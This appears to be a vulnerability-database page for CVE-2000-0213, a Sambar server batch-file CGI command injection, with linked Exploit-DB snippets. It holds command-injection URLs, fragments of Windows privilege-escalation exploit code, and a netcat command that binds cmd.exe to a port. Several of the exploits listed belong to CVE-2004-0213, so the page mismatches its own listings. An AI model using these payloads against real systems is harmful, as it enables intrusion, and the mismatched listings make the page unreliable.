CVE-2000-0213
published 2000-02-23CVE-2000-0213: The Sambar server includes batch files ECHO.BAT and HELLO.BAT in the CGI directory, which allow remote attackers to execute commands via shell metacharacters.
PriorityP428medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
10.00%
95.0th percentile
The Sambar server includes batch files ECHO.BAT and HELLO.BAT in the CGI directory, which allow remote attackers to execute commands via shell metacharacters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sambar | sambar_server | <= 4.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
exploitdb·2004-07-20
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
---
/******************************************************************************************
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** v2.666: added autonomous (allinone) remote exploitation system ;) **
** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a **
** normal user account). Must be called with an argument (any argument) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4***
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
---
/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at
#include
struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[]
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
exploitdb·2004-07-14
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
---
//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";
// run utility manager
// system("utilman.exe /start");
// Sleep(500);
lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then
run UtilManExploit2.exe\n");
return 0;
}
PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button
in the taskbar o
Exploit-DB
Sambar Server 4.2 Beta 7 - Batch CGI
exploitdb·2000-02-24
CVE-2000-0213 Sambar Server 4.2 Beta 7 - Batch CGI
Sambar Server 4.2 Beta 7 - Batch CGI
---
source: https://www.securityfocus.com/bid/1002/info
The Sambar Web/FTP/Proxy Server for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system, including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by default: 'hello.bat' and 'echo.bat'.
http://target/cgi-bin/hello.bat?&dir+c:or
http://target/cgi-bin/echo.bat?&dir+c:\
No writeups or analysis indexed.
http://www.sambar.com/session/highlight?url=/syshelp/history.htm&words=security+&color=redhttp://www.securityfocus.com/bid/1002http://www.securityfocus.com/templates/archive.pike?list=1&msg=38B3E60A.6A84FEC3%40cybcom.nethttp://www.sambar.com/session/highlight?url=/syshelp/history.htm&words=security+&color=redhttp://www.securityfocus.com/bid/1002http://www.securityfocus.com/templates/archive.pike?list=1&msg=38B3E60A.6A84FEC3%40cybcom.net
2000-02-23
Published